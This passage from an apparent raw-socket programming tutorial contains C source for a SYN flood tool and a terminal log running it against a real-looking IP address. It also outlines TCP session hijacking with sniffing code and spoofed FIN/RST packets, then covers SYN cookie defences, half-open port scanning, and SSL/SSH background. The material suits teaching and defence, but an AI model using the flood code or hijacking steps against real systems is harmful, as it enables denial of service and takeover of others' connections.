    tcph->tcph_destport = htons (floodport);
    /* in a SYN packet, the sequence is a random */
    tcph->tcph_seqnum = htonl (random());
    /* number, and the ACK sequence is 0 in the 1st packet */
    tcph->tcph_acknum = 0;
    tcph->tcph_res2 = 0;
    /* first and only tcp segment: 5 words, header without options */
    tcph->tcph_offset = 5;
    /* initial connection request. tcph_syn is a 1-bit field, so it is set
       to 1; the equivalent mask in tcp.h is TH_SYN = 0x02 */
    tcph->tcph_syn = 1;
    /* maximum allowed window size (16-bit field, so htons) */
    tcph->tcph_win = htons (65535);
    /* the kernel's IP stack fills in the IP header checksum during
       transmission, but not the TCP checksum. It is left at zero in this
       example, so a receiver that validates it will discard the segment. */
    tcph->tcph_chksum = 0;
    tcph->tcph_urgptr = 0;

    /* IP header checksum: IP header only, counted in 16-bit words */
    iph->iph_chksum = csum ((unsigned short *) datagram, sizeof (struct ipheader) >> 1);

    /* a IP_HDRINCL call, to make sure that the kernel knows
       the header is included in the data, and doesn't insert
       its own header into the packet before our data */
    /* Some dummy */
    int tmp = 1;
    const int *val = &tmp;

    if(setsockopt (s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0)
    {
        printf("Error: setsockopt() - Cannot set HDRINCL!\n");
        /* If something wrong, just exit */
        exit(-1);
    }
    else
        printf("OK, using your own header!\n");

    /* You have to manually stop this program */
    while(1)
    {
        if(sendto(s,                        /* our socket */
                  datagram,                 /* the buffer containing headers and data */
                  iph->iph_len,             /* total length of our datagram */
                  0,                        /* routing flags, normally always 0 */
                  (struct sockaddr *) &sin, /* socket addr, just like in */
                  sizeof (sin)) < 0)        /* a normal send() */
            printf("sendto() error!!!.\n");
        else
            printf("Flooding %s at %u...\n", argv[1], floodport);
    }
    return 0;
}

[root@bakawali testraw]# gcc synflood.c -o synflood
[root@bakawali testraw]# ./synflood
Invalid parameters!
Usage: ./synflood <target IP/hostname> <port to be flooded>
[root@bakawali testraw]# ./synflood 203.106.93.88 53
OK, using your own header!
Flooding 203.106.93.88 at 53...
Flooding 203.106.93.88 at 53...
Flooding 203.106.93.88 at 53...
Flooding 203.106.93.88 at 53...
Flooding 203.106.93.88 at 53...
...

You can verify this attack at the target machine by issuing the tcpdump -vv command or other network monitoring programs such as Ethereal.

SYN Cookies

SYN flooding leaves a number of half-open connections on the server while the server is waiting for the ACK that answers its SYN-ACK. As long as the connection state is maintained, SYN flooding can prove to be a disaster in a production network. Though SYN flooding capitalizes on a basic flaw in TCP, ways have been found to keep the target system from going down by not maintaining connection states that consume precious resources. Increasing the connection queue and decreasing the connection time-out period will help to a certain extent, but won't be effective under a rapid DDoS attack. SYN Cookies have been introduced and have become part of the Linux kernel in order to protect your system from a SYN flood. In the SYN cookies implementation of TCP, when the server receives a SYN packet, it responds with a SYN-ACK packet whose sequence number is calculated from the source address, source port, source sequence number, destination address, destination port, and a secret seed. Then the server relinquishes the state about the connection. If an ACK comes from the client, the server can recalculate the value to determine whether it is a response to the SYN-ACK which the server sent earlier. To protect your system from SYN flooding, SYN Cookies have to be enabled.

1. Add the line echo 1 > /proc/sys/net/ipv4/tcp_syncookies to your /etc/rc.d/rc.local script.
2. Edit the /etc/sysctl.conf file and add the following line: net.ipv4.tcp_syncookies = 1
3. Restart your system.
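The recalculation idea behind SYN cookies can be sketched with a toy example. This is emphatically not the Linux kernel's algorithm: mix32 is a made-up, non-cryptographic mixer, and conn_tuple, make_cookie and cookie_is_valid are hypothetical names. The sketch only shows how a server could derive its SYN-ACK sequence number from the connection details plus a secret, keep no state, and later check the client's ACK by recomputing the same value.

```c
#include <stdint.h>

/* The address/port details of one connection attempt */
struct conn_tuple {
    uint32_t saddr, daddr;
    uint16_t sport, dport;
};

/* Toy mixer for illustration only (not cryptographic, not the kernel's) */
static uint32_t mix32(uint32_t h, uint32_t v)
{
    h ^= v;
    h *= 0x9E3779B1u;
    h ^= h >> 15;
    return h;
}

/* Sequence number the server would place in its SYN-ACK */
uint32_t make_cookie(const struct conn_tuple *t, uint32_t client_isn,
                     uint32_t secret)
{
    uint32_t h = secret;

    h = mix32(h, t->saddr);
    h = mix32(h, t->daddr);
    h = mix32(h, ((uint32_t)t->sport << 16) | t->dport);
    return h + client_isn;
}

/* The final ACK carries seq = client ISN + 1 and ack = cookie + 1.
   The server recomputes the cookie instead of looking up stored state. */
int cookie_is_valid(const struct conn_tuple *t, uint32_t ack_seq,
                    uint32_t ack_ack, uint32_t secret)
{
    return make_cookie(t, ack_seq - 1, secret) == ack_ack - 1;
}
```

A real implementation would use a keyed cryptographic hash and also encode a time counter and the MSS; those details are left out here.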
Session Hijacking

Raw sockets can also be used for session hijacking. In this case, we inject our own packet that has the same specification as the original packet and replaces it. As discussed in the previous section on TCP connection termination, the client that needs to terminate the connection sends a FIN segment to the server (a TCP packet with the FIN flag set), indicating that it has finished sending data. The server, upon receiving the FIN segment, does not terminate the connection but enters a "passive close" (CLOSE_WAIT) state and sends an ACK for the FIN back to the client with the sequence number incremented by one. Once the server has sent its own FIN, it enters the LAST_ACK state. When the client gets the FIN from the server, it enters the TIME_WAIT state and sends an ACK back to the server with the sequence number incremented by one. When the server gets the ACK from the client, it closes the connection.

Before trying to hijack a TCP connection, we need to understand the TIME_WAIT state. Consider two systems, A and B, communicating. After terminating the connection, if these two systems want to communicate again, they should not be allowed to establish a connection before a certain period has passed. This is so that stray packets (if there are any) from the initial session do not confuse the initialization of the second session. So TCP sets the TIME_WAIT period to twice the MSL (Maximum Segment Lifetime) of a packet. We can spoof our TCP packets and try to reset an established TCP connection with the following steps:

1. Sniff a TCP connection. In Linux, for example, we need to set our network interface card (NIC) to promiscuous mode. In a program, this can be done by using setsockopt(). For example:

// add the promiscuous mode
// struct packet_mreq and PACKET_MR_PROMISC come from <linux/if_packet.h>.
// ifconfig here appears to be the program's own structure, holding the
// packet socket descriptor (sockid) and the interface index (ifindex).
struct packet_mreq mr;
memset(&mr, 0, sizeof(mr));
mr.mr_ifindex = ifconfig.ifindex;
mr.mr_type = PACKET_MR_PROMISC;

if(setsockopt(ifconfig.sockid, SOL_PACKET, PACKET_ADD_MEMBERSHIP, (char *)&mr, sizeof(mr)) < 0)
{
    perror("Failed to add the promiscuous mode");
    return (1);
}

2. Check whether the packet has the ACK flag set. If it is set, record the acknowledgment number (which will be the sequence number of our next packet) along with the source IP address.

3. Establish a raw socket with a spoofed IP address and send a FIN packet to the client using the recorded sequence number. Make sure that you have also set the ACK flag.

Session hijacking can also be done with the RST (Reset) flag.

A sniffer program must make the network interface card (NIC) on a machine enter so-called promiscuous mode. This is because an Ethernet NIC, for example, is built with a filter that ignores all traffic not addressed to it; that is, it ignores all frames whose destination MAC address does not match its own. Through the NIC's driver, a sniffer program needs to turn off this filter, putting the NIC into promiscuous mode so that it accepts all frames it sees regardless of their destination. The typical NICs used in workstations and PCs nowadays can be switched into and out of promiscuous mode quite easily. In fact, on many NICs it is also possible to reprogram the MAC address. Network analyzing equipment deliberately and legitimately needs to observe all traffic, and hence must be promiscuous.

SYN Handshakes

Port scanners such as Nmap use raw sockets for the sake of stealth. They use a half-open SYN handshake that basically works like the following steps:

1. Host A sends a special SYN packet to host B.
2. Host B sends back a SYN/ACK packet to host A.
3. Host A sends an RST packet in return.

With a full handshake, host B knows when it gets a connection, and this is how most simple port scanners work. Nmap and others, however, use raw sockets. When the SYN/ACK packet is received from host B, indicating that B got the SYN, host A sends an RST (short for ReSeT) packet back to host B, in effect saying never mind about the connection. The two hosts never make a full connection, and the scan remains stealthy.

As this Module has shown, raw sockets are an extremely powerful method of controlling the underlying protocol of a packet and its data. Any network programmer should learn and understand how to use them for the right purposes.

Further interesting reading and digging:

Secure Socket Layer (SSL)

SSL is a protocol developed originally by Netscape for transmitting private documents via the Internet in an encrypted form. SSL ensures that the information is sent, unchanged, only to the server you intended to send it to. For example, online shopping sites frequently use SSL technology to safeguard your credit card information. It encrypts TCP/IP traffic and also incorporates authentication and data integrity. The newest version of SSL is referred to as Transport Layer Security (TLS); the specification can be found in RFC 2246, and TLS v1.0 is equivalent to SSL v3.1. SSL runs on top of TCP/IP and can be applied to almost any sort of connection-oriented communication.

SSL is based on session-key encryption. It adds a number of extra features, including authentication based on X.509 certificates and integrity checking with message authentication codes. It is an extension of sockets that allows a client and a server to establish a stream of communication with each other in a secured manner. The two sides begin with a handshake, which allows identities to be established and keys to be exchanged. For this, SSL uses a cryptographic system with two keys: a public key known to everyone and a private or secret key known only to the recipient of the message.

SSL is most commonly used to secure HTTP. Both Netscape Navigator and Internet Explorer browsers support SSL, and many web sites use the protocol to obtain confidential user information. By convention, URLs that require an SSL connection start with https: instead of http:. Another protocol for transmitting data securely over the World Wide Web is Secure HTTP (S-HTTP). Whereas SSL creates a secure connection between a client and a server, over which any amount of data can be sent securely, S-HTTP is designed to transmit individual messages securely. SSL and S-HTTP, therefore, can be seen as complementary rather than competing technologies. Both protocols have been published by the Internet Engineering Task Force (IETF): TLS as a standards-track protocol and S-HTTP as an experimental RFC.

You can try OpenSSL, an open source implementation, to learn more about SSL. One real project that implements SSL is the Apache web server (apache-ssl). Information about program examples can be obtained at openssl examples.

Secure Shell (SSH)

Many users of telnet, rlogin, ftp and other communication programs transmit data such as user names and passwords across the Internet in unencrypted form. SSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other network-level attacks. Originally developed by SSH Communications Security Ltd., Secure Shell provides strong authentication and secure communications over insecure channels such as the Internet. It is a replacement for the unsecured rlogin, rsh, rcp, and rdist. SSH protects a network from attacks such as IP spoofing, IP source routing, and DNS spoofing. An attacker who has managed to take over a network can only force SSH to disconnect; he or she cannot play back the traffic or hijack the connection when encryption is enabled. For example, when using ssh's secure login (instead of rlogin), the entire login session, including transmission of the password, is encrypted; therefore it is almost impossible for an outsider to collect passwords.

SSH is available for Windows, Unix, Macintosh, and OS/2, in commercial and open source versions, and it also works with RSA authentication. To learn more about SSH, you can use the free, open source version, OpenSSH. The OpenSSH suite includes the ssh program, which replaces rlogin and telnet; scp, which replaces rcp; and sftp, which replaces ftp. Also included are sshd, which is the server side of the package, and other basic utilities such as ssh-add, ssh-agent, ssh-keysign, ssh-keyscan, ssh-keygen and sftp-server. OpenSSH supports SSH protocol versions 1.3, 1.5, and 2.0.
